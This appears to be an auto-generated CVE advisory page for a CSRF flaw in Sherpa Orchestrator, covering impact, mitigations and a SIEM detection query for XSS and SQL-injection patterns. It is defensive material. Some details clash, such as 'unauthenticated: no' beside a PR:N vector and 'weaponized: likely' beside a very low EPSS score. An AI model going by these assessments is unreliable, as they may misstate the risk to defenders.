CVE-2025-46547 – Sherpa Orchestrator 141851 lacks CSRF protectio... (How to Fix)

Q: What is the severity of CVE-2025-46547?

CVE-2025-46547 has a CVSS score of 5.4 (MEDIUM). Sherpa Orchestrator 141851 lacks CSRF protection, allowing attackers to trick authenticated users into performing unauthorized actions. This can lead to XSS attacks, unauthorized user/role creation, or SQL injection exploitation. Organizations running vulnerable Sherpa Orchestrator instances are affected.

📋 TL;DR

Sherpa Orchestrator 141851 lacks CSRF protection, allowing attackers to trick authenticated users into performing unauthorized actions. This can lead to XSS attacks, unauthorized user/role creation, or SQL injection exploitation. Organizations running vulnerable Sherpa Orchestrator instances are affected.

💻 Affected Systems

Products:

Sherpa Orchestrator

Versions: 141851

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments of Sherpa Orchestrator version 141851 are vulnerable regardless of configuration.

📦 What is this software?

Sherpa Orchestrator by Sherparpa

View all CVEs affecting Sherpa Orchestrator →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the Sherpa Orchestrator instance through SQL injection leading to data exfiltration, privilege escalation via new admin user creation, and persistent XSS payloads affecting all users.

🟠

Likely Case

Unauthorized user/role creation leading to privilege escalation and potential data access, or XSS attacks compromising user sessions.

🟢

If Mitigated

Limited impact with proper network segmentation, strong authentication, and monitoring detecting unusual user creation or SQL queries.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

CSRF exploitation requires tricking authenticated users, but the attack vectors (XSS, SQLi, user creation) are well-understood and easily weaponized.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://sherparpa.com

Restart Required: No

Instructions:

1. Check vendor advisory at sherparpa.com for updates. 2. If patch available, download and apply per vendor instructions. 3. Verify CSRF protection is implemented in web application.

🔧 Temporary Workarounds

Implement CSRF Tokens

all

Add CSRF tokens to all state-changing requests in Sherpa Orchestrator web application.

Requires code modification - implement anti-CSRF tokens in web application framework

WAF Configuration

all

Configure WAF to detect and block CSRF, XSS, and SQL injection attempts.

WAF-specific configuration commands vary by vendor

🧯 If You Can't Patch

Implement strict network access controls to limit Sherpa Orchestrator access to trusted users only
Enable detailed logging and monitoring for user creation events, SQL queries, and XSS payloads

🔍 How to Verify

Check if Vulnerable:

Test web application endpoints for CSRF protection by checking for anti-CSRF tokens in forms and state-changing requests.

Check Version:

Check Sherpa Orchestrator web interface or configuration files for version information

Verify Fix Applied:

Verify CSRF tokens are present and validated in all state-changing requests, and test for XSS/SQLi vulnerabilities.

📡 Detection & Monitoring

Log Indicators:

Unexpected user creation events
Unusual SQL query patterns
XSS payloads in request logs

Network Indicators:

CSRF attack patterns in HTTP requests
SQL injection attempts in web traffic

SIEM Query:

source="sherpa_logs" AND (event="user_created" OR query="*SELECT*" OR request="*<script>*")

📊 Metadata

CVE ID: CVE-2025-46547

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-352

EPSS Score: 0.03% exploit probability (8th percentile)

Published: April 25, 2025

Last Updated: October 16, 2025

🔗 References

https://deiteriy.com Not Applicable
https://gist.github.com/ArtemBrylev/9af206c46d7505db03ad6fcd9fc46f7f Third Party Advisory
https://sherparpa.com Product
https://twitter.com/ArtyomBrylev Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-46547, you might also want to check these: